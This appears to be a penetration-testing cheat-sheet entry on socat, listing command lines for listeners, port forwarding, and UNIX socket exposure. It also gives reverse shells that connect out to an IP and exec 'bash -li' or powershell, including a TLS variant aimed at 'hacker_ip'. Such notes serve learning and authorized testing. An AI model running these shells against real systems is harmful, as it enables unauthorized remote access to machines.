socat ¶

socat is a command similar to netcat. Similarly to other wrappers, it can be used for a client or a server, but with socat, you will mostly use a wrapper for both sides.

On the target, you will most likely have to upload a static binary of socat as the command is rarely already installed.

The command is taking two "addresses":

$ socat EXPR1 EXPR2

➡️ Add -d -d for debug information.

A few basic elements:

• TCP-L:port/TCP-LISTEN:port: listen on that port
• TCP:IP:port: connect to a host on a port
• -/STDOUT: write to stdout
• EXEC:xxx: connect to a command
• FILE:xxx: connect to a file

For a server similar nc -lnp port:

$ socat TCP-L:port FILE:`tty`,raw,echo=0 # interactive
$ socat TCP-L:port -                     # semi-interactive
$ socat TCP-LISTEN:port STDOUT           # semi-interactive

For a client similar to nc IP port [...]:

$ socat TCP:IP:port EXEC:"bash -li",pty,stderr,sigint,setsid,sane # interactive
$ socat TCP:IP:port EXEC:"bash -li"             # semi-interactive
PS> socat TCP:IP:port EXEC:powershell.exe,pipes # semi-interactive?

To use SSL/TLS, you need to generate a certificate, try with openssl.

$ cat key.pem cert.pem > shell.pem
$ socat OPENSSL-LISTEN:port,cert=shell.pem,verify=0 [...] # Server
$ socat OPENSSL:hacker_ip:port,verify=0 [...] # Client

To expose a UNIX socket at localhost:1234:

$ socat TCP-LISTEN:1234,reuseaddr,fork UNIX-CONNECT:/path/to/xxx.sock

Listen on traffic on 1234 and forward it to IP:port:

$ socat TCP4-LISTEN:1234,fork TCP4:IP:port